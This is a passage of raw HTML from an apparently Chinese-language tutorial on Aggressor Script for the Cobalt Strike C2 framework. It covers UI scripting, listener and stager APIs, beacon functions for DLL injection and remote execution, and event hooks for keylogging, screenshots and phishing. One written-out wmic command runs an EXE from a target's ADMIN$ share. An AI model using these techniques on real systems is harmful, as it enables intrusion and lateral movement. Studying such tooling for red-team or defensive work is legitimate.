style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(119, 0, 136);">bind</span> <span style="box-sizing: border-box;color: rgb(85, 85, 85);">Ctrl</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">+</span><span style="box-sizing: border-box;color: rgb(85, 85, 85);">H</span> {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(85, 85, 85);">show_message</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"Hello World!"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span></pre><ul class="list-paddingleft-1" cid="n62" mdtype="list" data-mark="+" style="margin-top: 0.8em;margin-bottom: 0.8em;padding-left: 30px;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;white-space: normal;"><li style="box-sizing: border-box;"><p cid="n64" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">目录</span></p></li></ul><pre spellcheck="false" lang="perl" cid="n65" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(85, 85, 85);">popup</span> <span style="box-sizing: border-box;color: rgb(85, 85, 85);">pgraph</span> {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(85, 85, 85);">menu</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"&Layout"</span> {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">      <span style="box-sizing: border-box;color: rgb(85, 85, 85);">item</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"&Circle"</span>    { <span style="box-sizing: border-box;color: rgb(85, 85, 85);">graph_layout</span>(<span style="box-sizing: border-box;color: rgb(0, 85, 170);">$1</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"circle"</span>); }</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">      <span style="box-sizing: border-box;color: rgb(85, 85, 85);">item</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"&Stack"</span>     { <span style="box-sizing: border-box;color: rgb(85, 85, 85);">graph_layout</span>(<span style="box-sizing: border-box;color: rgb(0, 85, 170);">$1</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"stack"</span>); }</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">      <span style="box-sizing: border-box;color: rgb(85, 85, 85);">menu</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"&Tree"</span> {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">         <span style="box-sizing: border-box;color: rgb(85, 85, 85);">item</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"&Bottom"</span> { <span style="box-sizing: border-box;color: rgb(85, 85, 85);">graph_layout</span>(<span style="box-sizing: border-box;color: rgb(0, 85, 170);">$1</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"tree-bottom"</span>); }</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">         <span style="box-sizing: border-box;color: rgb(85, 85, 85);">item</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"&Left"</span>   { <span style="box-sizing: border-box;color: rgb(85, 85, 85);">graph_layout</span>(<span style="box-sizing: border-box;color: rgb(0, 85, 170);">$1</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"tree-left"</span>); }</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">         <span style="box-sizing: border-box;color: rgb(85, 85, 85);">item</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"&Right"</span>  { <span style="box-sizing: border-box;color: rgb(85, 85, 85);">graph_layout</span>(<span style="box-sizing: border-box;color: rgb(0, 85, 170);">$1</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"tree-right"</span>); }</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">         <span style="box-sizing: border-box;color: rgb(85, 85, 85);">item</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"&Top"</span>    { <span style="box-sizing: border-box;color: rgb(85, 85, 85);">graph_layout</span>(<span style="box-sizing: border-box;color: rgb(0, 85, 170);">$1</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"tree-top"</span>); }</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">      }</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">      <span style="box-sizing: border-box;color: rgb(85, 85, 85);">separator</span>();</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">      <span style="box-sizing: border-box;color: rgb(85, 85, 85);">item</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"&None"</span> { <span style="box-sizing: border-box;color: rgb(85, 85, 85);">graph_layout</span>(<span style="box-sizing: border-box;color: rgb(0, 85, 170);">$1</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"none"</span>); }</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   }</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span></pre><ul class="list-paddingleft-1" cid="n66" mdtype="list" data-mark="+" style="margin-top: 0.8em;margin-bottom: 0.8em;padding-left: 30px;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;white-space: normal;"><li style="box-sizing: border-box;"><p cid="n68" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">自定义输出</span></p></li></ul><pre spellcheck="false" lang="perl" cid="n69" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(85, 85, 85);">set</span> <span style="box-sizing: border-box;color: rgb(85, 85, 85);">EVENT_SBAR_LEFT</span> {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(119, 0, 136);">return</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"["</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">.</span> <span style="box-sizing: border-box;color: rgb(85, 85, 85);">tstamp</span>(<span style="box-sizing: border-box;color: rgb(85, 85, 85);">ticks</span>()) <span style="box-sizing: border-box;color: rgb(152, 26, 26);">.</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"] "</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">.</span> <span style="box-sizing: border-box;color: rgb(85, 85, 85);">mynick</span>();</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"> </span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(85, 85, 85);">set</span> <span style="box-sizing: border-box;color: rgb(85, 85, 85);">EVENT_SBAR_RIGHT</span> {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(119, 0, 136);">return</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"[lag: $1 $+ ]"</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span></pre><ul class="list-paddingleft-1" cid="n70" mdtype="list" data-mark="+" style="margin-top: 0.8em;margin-bottom: 0.8em;padding-left: 30px;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;white-space: normal;"><li style="box-sizing: border-box;"><p cid="n72" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">事件</span></p></li></ul><pre spellcheck="false" lang="perl" cid="n73" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(85, 85, 85);">on</span> <span style="box-sizing: border-box;color: rgb(85, 85, 85);">ready</span> {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(85, 85, 85);">show_message</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"Ready for action!"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(85, 85, 85);">on</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">*</span> {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(0, 0, 255);">local</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">'$handle $event $args'</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"> </span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(0, 0, 0);">$event</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">shift</span>(<span style="box-sizing: border-box;color: rgb(0, 85, 170);">@_</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(0, 0, 0);">$args</span>  <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">join</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">" "</span>, <span style="box-sizing: border-box;color: rgb(0, 85, 170);">@_</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"> </span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(0, 0, 0);">$handle</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(85, 85, 85);">openf</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">">>eventspy.txt"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(85, 85, 85);">writeb</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">$handle</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"[ $+ $event $+ ] $args"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">   <span style="box-sizing: border-box;color: rgb(85, 85, 85);">closef</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">$handle</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span></pre><h3 cid="n74" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.5em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.43;cursor: text;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">数据接口</span></h3><p cid="n75" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">使用data_query函数可以查看数据类型，使用data_key列出来自Cobalt Strike的数据模型的可查询键</span></p><p cid="n76" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">，这边可以看下官方实例就可以看出cs的target数据模型就是Sleep字典数组</span></p><p style="text-align: center;"></p><h3 cid="n78" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.5em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.43;cursor: text;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">listener api</span></h3><ul class="list-paddingleft-1" cid="n79" mdtype="list" data-mark="+" style="margin-top: 0.8em;margin-bottom: 0.8em;padding-left: 30px;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;white-space: normal;"><li style="box-sizing: border-box;"><p cid="n81" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">listeners ：函数获取所有的listener,</span></p></li><li style="box-sizing: border-box;"><p cid="n83" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">listener_local：返回当前server的listener</span></p></li><li style="box-sizing: border-box;"><p cid="n85" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">listener_create_ext：启动listener</span></p></li><li style="box-sizing: border-box;"><p cid="n87" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">openPayloadHelper ：打开一个对话框，列出所有可用的侦听器</span></p></li><li style="box-sizing: border-box;"><p cid="n89" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">stager：导出绑定了cs payload的stager</span></p></li><li style="box-sizing: border-box;"><p cid="n91" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">artifact_stager：可以导出绑定了cs payload的ps脚本、EXE、或dll</span></p></li><li style="box-sizing: border-box;"><p cid="n93" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">stager_bind_tcp：绑定tcp的stager</span></p></li><li style="box-sizing: border-box;"><p cid="n95" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">beacon_stage_tcp：向stager_bind_tcp传递payload</span></p></li><li style="box-sizing: border-box;"><p cid="n97" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">artifact_general：接收shellcode并产生payload</span></p></li><li style="box-sizing: border-box;"><p cid="n99" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">stager_bind_pipe ：stager仅支持x86</span></p></li><li style="box-sizing: border-box;"><p cid="n101" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">beacon_stage_pipe：向 stager_bind_pipe传递payload</span></p></li><li style="box-sizing: border-box;"><p cid="n103" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">payload：将payload导出为可运行二进制文件</span></p></li></ul><h3 cid="n104" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.5em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.43;cursor: text;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">beacon</span></h3><p cid="n105" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">Cobalt Strike 为每个 Beacon 分配一个会话 ID。这个 ID 是一个随机数。Cobalt Strike 将任务和元数据与每个 Beacon ID 相关联</span></p><ul class="list-paddingleft-1" cid="n106" mdtype="list" data-mark="+" style="margin-top: 0.8em;margin-bottom: 0.8em;padding-left: 30px;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;white-space: normal;"><li style="box-sizing: border-box;"><p cid="n108" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">beacons查询所有当前 Beacon 会话的元数据</span></p></li><li style="box-sizing: border-box;"><p cid="n110" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">beacon_info查询特定 Beacon 会话的元数据</span></p></li><li style="box-sizing: border-box;"><p cid="n112" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">alias 设置别名</span></p></li><li style="box-sizing: border-box;"><p cid="n114" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">beacon_initial 事件在 Beacon 第一次报告元数据时触发</span></p></li><li style="box-sizing: border-box;"><p cid="n116" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">beacon_initial_empty 与首次呼叫 home 的 DNS Beacon交互</span></p></li><li style="box-sizing: border-box;"><p cid="n118" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">btask：向用户确认操作</span></p></li><li style="box-sizing: border-box;"><p cid="n122" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">beacon_host_script:托管大型脚本</span></p></li><li style="box-sizing: border-box;"><p cid="n124" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">bdllspawn 函数生成一个临时进程，将我们的漏洞利用 DLL 注入其中，并将我们导出的payload作为参数传递</span></p></li><li style="box-sizing: border-box;"><p cid="n126" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">beacon_remote_exec_method_register:尝试远程执行命令</span></p></li><li style="box-sizing: border-box;"><p cid="n128" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">bupload_raw函数将工件数据上传到目标。此函数使用</span><span md-inline="strong" style="box-sizing: border-box;"><strong style="box-sizing: border-box;"><span md-inline="escape" style="box-sizing: border-box;">\</span><span md-inline="plain" style="box-sizing: border-box;">target\ADMIN$\filename.exe</span></strong></span><span md-inline="plain" style="box-sizing: border-box;">通过仅限管理员的共享直接将 EXE 写入远程目标</span></p></li><li style="box-sizing: border-box;"><p cid="n130" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">brun运行</span><span md-inline="strong" style="box-sizing: border-box;"><strong style="box-sizing: border-box;"><span md-inline="plain" style="box-sizing: border-box;">wmic /node:"target" process call create "</span><span md-inline="escape" style="box-sizing: border-box;">\</span><span md-inline="plain" style="box-sizing: border-box;">target\ADMIN$\filename.exe"</span></strong></span><span md-inline="plain" style="box-sizing: border-box;">以在远程目标上执行文件</span></p></li><li style="box-sizing: border-box;"><p cid="n132" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">bpowerpick:生成一个进程，注入 Unmanaged PowerShell并执行</span></p></li></ul><h3 cid="n133" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.5em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.43;cursor: text;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">事件</span></h3><pre spellcheck="false" lang="" cid="n134" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">beacon_checkin beacon准入确认发往console时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">beacon_error beacon错误发布到console时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">beacon_indicator</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">beacon_initial beacon第一次报告元数据时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">beacon_initial_empty 与首次呼叫 home 的 DNS Beacon交互时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">beacon_input beacon传入信息发布到console时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">beacon_mode 更改beacon模式时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">beacon_output 输出发布到console时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">beacon_output_alt 当（备用）输出发布到 Beacon 的控制台时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">beacon_output_jobs当job输出发送到 Beacon 的控制台时触发。</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">beacon_output_ls 当 ls 输出发送到 Beacon 的控制台时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">beacon_output_ps当 ps 输出发送到 Beacon 的控制台时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">beacon_tasked 当task输出到console时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">beacons 当server发送有关我们所有信标的最新信息时触发。这大约每秒发生一次</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">disconnect  cs客户端与cs服务端断开时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">event_action当用户在事件日志中执行操作时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">event_beacon_initial当初始信标消息发布到事件日志时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">event_join当用户连接到server时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">event_newsite当新站点消息发布到事件日志时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">event_notify当来自server的消息发布到事件日志时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">event_nouser当前 Cobalt Strike 客户端尝试与未连接到server的用户交互时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">event_private当private消息发布到事件日志时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">event_public当public消息发布到事件日志时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">heartbeat_* 每隔*时间触发一次</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">keylogger_hit当通过克隆站点击键记录器向 Web 服务器报告新结果时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">keystrokes当 Cobalt Strike 收到击键时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">profiler_hit当有新的结果报告给 System Profiler 时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">ready当此 Cobalt Strike 客户端连接到server并准备好行动时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">screenshots当 Cobalt Strike 收到屏幕截图时触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">sendmail_*发送钓鱼邮件过程中触发</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">ssh_*同beacon，但session为ssh</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">web_hit 服务器有web访问时触发</span></pre><h3 cid="n135" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.5em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.43;cursor: text;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">其他函数</span></h3><pre spellcheck="false" lang="" cid="n136" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">hasbootstraphint 是否有引导函数</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">is64 是否是64位平台</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">isactive 是否活动</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">isadmin是否为管理员</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">isssh 是否是</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">show_message向用户提示消息</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">show_error提示用户错误。</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">dialog创建一个对话框</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">drow_file 文件输入对话框</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">drow_text 文本输入对话框</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">drow_combobox 选择栏对话框</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">dialog_show 显示对话框</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">dbutton_action 关闭对话框并调用对话框回调函数</span></pre><p cid="n137" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 